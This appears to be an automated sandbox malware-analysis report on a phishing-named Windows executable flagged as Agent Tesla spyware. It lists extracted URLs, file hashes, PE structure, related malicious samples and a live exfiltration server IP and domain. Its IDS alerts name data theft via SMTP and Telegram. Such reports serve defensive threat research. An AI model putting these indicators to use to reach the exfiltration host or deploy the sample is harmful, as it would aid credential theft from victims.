                        http://nhEGCU.comMSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fontbureau.comcomBANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://DynDns.comDynDNSnamejidpasswordPsi/PsiMSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/DPleaseBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comgritoBANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.fontbureau.comttoBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.fonts.comBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245874250.000000000591B000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245858860.0000000005924000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245884516.0000000005924000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.245841440.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.sandoll.co.krBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.urwpp.deDPleaseBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.urwpp.deBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.zhongyicts.com.cnBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sakkal.comBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.sandoll.co.krBBANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.comFHsBANK DATAILS.exe, 00000000.00000003.253363943.000000000590A000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.fontbureau.comI.TTFdsBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          unknown
                          http://www.founder.com.cn/cnl-nBANK DATAILS.exe, 00000000.00000003.248786545.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/deBANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.comdvBANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.apache.org/licenses/LICENSE-2.0BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.comBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.287367631.0000000005900000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.fontbureau.comFBANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.sandoll.co.krdqBANK DATAILS.exe, 00000000.00000003.248046779.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.founder.com.cBANK DATAILS.exe, 00000000.00000003.249079298.0000000005909000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248813527.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://wwwMSBuild.exe, 00000006.00000002.512007583.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://www.tiro.comaQBANK DATAILS.exe, 00000000.00000003.246434562.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.fontbureau.com/designers/cabarga.htmleBANK DATAILS.exe, 00000000.00000003.253469560.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253525233.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253493892.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253575573.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253540774.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253620821.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.comdBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.carterandcone.comlBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.founder.com.cn/cn/BANK DATAILS.exe, 00000000.00000003.249073188.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  http://www.fontbureau.com/designers/cabarga.htmlNBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.founder.com.cn/cn.BANK DATAILS.exe, 00000000.00000003.248813527.0000000005904000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.founder.com.cn/cnBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.248786545.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://www.fontbureau.com/designers/frere-jones.htmlBANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.fontbureau.com/designers/cabarga.htmlBANK DATAILS.exe, 00000000.00000003.253469560.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253525233.000000000593D000.00000004.00000800.00020000.00000000.sdmp, BANK DATAILS.exe, 00000000.00000003.253493892.000000000593D000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.urwpp.deyqBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://www.jiyu-kobo.co.jp/BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.comoBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        http://www.fontbureau.com/designers8BANK DATAILS.exe, 00000000.00000002.301969282.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.fontbureau.comalsBANK DATAILS.exe, 00000000.00000003.254055255.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.fontbureau.comedeBANK DATAILS.exe, 00000000.00000003.253039302.0000000005909000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://www.tiro.comhBANK DATAILS.exe, 00000000.00000003.246280740.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          http://www.tiro.comcBANK DATAILS.exe, 00000000.00000003.246434562.000000000591B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          • URL Reputation: safe
                                          unknown
                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs
                                          IPDomainCountryFlagASNASN NameMalicious
                                          103.195.185.58
                                          webmail.keeprojects.inIndia
                                          394695PUBLIC-DOMAIN-REGISTRYUStrue
                                          IP
                                          192.168.2.1
                                          Joe Sandbox Version:35.0.0 Citrine
                                          Analysis ID:679255
                                          Start date and time: 05/08/202213:23:062022-08-05 13:23:06 +02:00
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 7m 30s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:BANK DATAILS.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:30
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.spre.troj.spyw.evad.winEXE@7/1@1/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:Failed
                                          HCA Information:
                                          • Successful, ratio: 100%
                                          • Number of executed functions: 82
                                          • Number of non-executed functions: 3
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                          • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          TimeTypeDescription
                                          13:24:18API Interceptor1x Sleep call for process: BANK DATAILS.exe modified
                                          13:24:30API Interceptor678x Sleep call for process: MSBuild.exe modified
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                          103.195.185.58FOLLOW UP PAYMENT.exeGet hashmaliciousBrowse
                                            LIST OF PRODUCT AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                              SecuriteInfo.com.W32.AIDetectNet.01.11575.exeGet hashmaliciousBrowse
                                                INVOICE.exeGet hashmaliciousBrowse
                                                  ARRIVAL NOTICE.exeGet hashmaliciousBrowse
                                                    CNC.exeGet hashmaliciousBrowse
                                                      CNC.exeGet hashmaliciousBrowse
                                                        features and accessories..exeGet hashmaliciousBrowse
                                                          features and accessories.exeGet hashmaliciousBrowse
                                                            DOCUMENTS.exeGet hashmaliciousBrowse
                                                              REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                PAYMENT FOR AMOUNT.exeGet hashmaliciousBrowse
                                                                  DOCUMENTS ASEAN.exeGet hashmaliciousBrowse
                                                                    SCANDINAVIA V020E.exeGet hashmaliciousBrowse
                                                                      payment instruction.exeGet hashmaliciousBrowse
                                                                        PO#7A68D20.exeGet hashmaliciousBrowse
                                                                          PO#7A68D20.exeGet hashmaliciousBrowse
                                                                            JCTRANS.exeGet hashmaliciousBrowse
                                                                              PAYMENT SLIP.exeGet hashmaliciousBrowse
                                                                                No. TIM-0372022e-I003.exeGet hashmaliciousBrowse
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  webmail.keeprojects.inFOLLOW UP PAYMENT.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  LIST OF PRODUCT AND SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.11575.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  INVOICE.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  ARRIVAL NOTICE.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  CNC.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  CNC.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  features and accessories..exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  features and accessories.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  REQUEST FOR QUOTATION.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  PAYMENT FOR AMOUNT.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  DOCUMENTS ASEAN.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  SCANDINAVIA V020E.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  payment instruction.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.58
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  PUBLIC-DOMAIN-REGISTRYUSWLmNdxIHr3.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.223
                                                                                  DOC_6000019430_AUGUST2022.EXEGet hashmaliciousBrowse
                                                                                  • 208.91.198.143
                                                                                  hpyvq3OqZv.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.225
                                                                                  D99Wy236LD.exeGet hashmaliciousBrowse
                                                                                  • 111.118.212.38
                                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.223
                                                                                  Swift Copy.exeGet hashmaliciousBrowse
                                                                                  • 103.21.58.15
                                                                                  PO-151.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.223
                                                                                  Invoice SIL-EDI-0-2022-392.exeGet hashmaliciousBrowse
                                                                                  • 119.18.49.30
                                                                                  PAYMENT ADVICE.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.225
                                                                                  IMG_03184.exeGet hashmaliciousBrowse
                                                                                  • 103.21.58.15
                                                                                  PURCHASE ORDER.exeGet hashmaliciousBrowse
                                                                                  • 111.118.215.251
                                                                                  ORDER-NO0003.exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.224
                                                                                  Doc_Requisition Quote_JULY2022.exeGet hashmaliciousBrowse
                                                                                  • 208.91.198.143
                                                                                  PO from Proform Technologies Inc 15124.pdf.rar.exeGet hashmaliciousBrowse
                                                                                  • 111.118.215.251
                                                                                  RFQ-Prebid Inquiries..exeGet hashmaliciousBrowse
                                                                                  • 208.91.199.224
                                                                                  SecuriteInfo.com.W32.AIDetectNet.01.25263.exeGet hashmaliciousBrowse
                                                                                  • 103.21.58.130
                                                                                  Payment Copy_Bank Fab.docGet hashmaliciousBrowse
                                                                                  • 103.21.58.130
                                                                                  Bank FAB_ Payment Copy_Pdf.exeGet hashmaliciousBrowse
                                                                                  • 103.21.58.130
                                                                                  n7SttFD3Nc.exeGet hashmaliciousBrowse
                                                                                  • 103.195.185.94
                                                                                  RFQ 0937728266.vbsGet hashmaliciousBrowse
                                                                                  • 111.118.215.251
                                                                                  No context
                                                                                  No context
                                                                                  Process:C:\Users\user\Desktop\BANK DATAILS.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.355304211458859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
                                                                                  MD5:69206D3AF7D6EFD08F4B4726998856D3
                                                                                  SHA1:E778D4BF781F7712163CF5E2F5E7C15953E484CF
                                                                                  SHA-256:A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
                                                                                  SHA-512:CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a
                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):6.984069886555404
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  File name:BANK DATAILS.exe
                                                                                  File size:845312
                                                                                  MD5:9c8721d5f0dfcb5893766810fc016b1b
                                                                                  SHA1:097e2d6bd75f55fee4ba991696d15bbd0f73137f
                                                                                  SHA256:22083794e761ae3e2fb684244ddadba8353b0dc25549d9591dbbd118dde52054
                                                                                  SHA512:83e9bd28a1ff90448cd029742dcf3dfea760ed70112ab85e840c661c053d59531f521e3d09a49c545cc7dc26b7bfc76d106e0bb3692b88c64c4f03acbe6177fa
                                                                                  SSDEEP:12288:OxjlkBIh6kLw/997uWi+bLtVo80FuYAMrovCSePuv:AsiAJJb3o8zsIh
                                                                                  TLSH:1205AE0123D17519E23E4F7549E2D0709BB7ED279826E2EE2CC83D4FB77BA448952722
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L..b..............P.............>.... ........@.. .......................@............@................................
                                                                                  Icon Hash:00828e8e8686b000
                                                                                  Entrypoint:0x4cfd3e
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x62ECC24C [Fri Aug 5 07:10:04 2022 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  add byte ptr [eax], al
                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xcfce80x53.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xd00000x390.rsrc
                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd20000xc.reloc
                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                  .text0x20000xcdd440xcde00False0.6690407748937462data6.9916083972247IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                  .rsrc0xd00000x3900x400False0.3828125data2.893537260945271IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                  .reloc0xd20000xc0x200False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                  NameRVASizeTypeLanguageCountry
                                                                                  RT_VERSION0xd00580x334data
                                                                                  DLLImport
                                                                                  mscoree.dll_CorExeMain
                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                  192.168.2.3103.195.185.58497375872839723 08/05/22-13:24:47.100821TCP2839723ETPRO TROJAN Win32/Agent Tesla SMTP Activity49737587192.168.2.3103.195.185.58
                                                                                  192.168.2.3103.195.185.58497375872851779 08/05/22-13:24:47.100944TCP2851779ETPRO TROJAN Agent Tesla Telegram Exfil49737587192.168.2.3103.195.185.58
                                                                                  192.168.2.3103.195.185.58497375872840032 08/05/22-13:24:47.100944TCP2840032ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M249737587192.168.2.3103.195.185.58
                                                                                  192.168.2.3103.195.185.58497375872030171 08/05/22-13:24:47.100821TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49737587192.168.2.3103.195.185.58
                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                  Aug 5, 2022 13:24:44.522775888 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:44.658198118 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:44.658328056 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:45.731394053 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:45.731714964 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:45.869232893 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:45.870805979 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:46.004103899 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.019043922 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:46.192163944 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.662942886 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.663623095 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:46.796436071 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.796494007 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.796808004 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:46.966094017 CEST58749737103.195.185.58192.168.2.3
                                                                                  Aug 5, 2022 13:24:46.966377974 CEST49737587192.168.2.3103.195.185.58
                                                                                  Aug 5, 2022 13:24:47.099303961 CEST58749737103.195.185.58192.168.2.3
